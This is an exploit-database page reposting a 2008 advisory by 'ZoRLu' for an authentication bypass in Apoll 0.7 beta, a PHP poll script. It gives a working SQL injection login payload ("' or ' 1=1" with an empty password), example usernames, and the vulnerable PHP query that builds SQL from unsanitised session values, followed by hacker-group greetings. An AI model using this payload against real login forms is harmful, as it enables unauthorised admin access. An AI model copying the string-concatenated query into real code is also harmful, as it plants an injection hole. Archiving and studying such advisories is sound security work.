Lucene search

K

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

๐Ÿ—“๏ธย 04 Nov 2008ย 00:00:00Reported byย RootTypeย 
seebug
ย seebug
๐Ÿ”—ย www.seebug.org๐Ÿ‘ย 10ย Views

Remote authentication bypass vulnerability in Apoll version 0.7 via SQL injection exploit.

Show more
Code

                                                [~] Apoll version Remote Auth Bypass Vulnerability
[~]
[~] version: beta 0.7
[~]
[~] script dwonload: http://www.miticdjd.com/download/3/
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin 


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or รฝ added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty 


file: 

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
	$num = @mysql_num_rows($mysql);




[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
04 Nov 2008 00:00Current
7.1High risk
Vulners AI Score7.1
10
.json
Report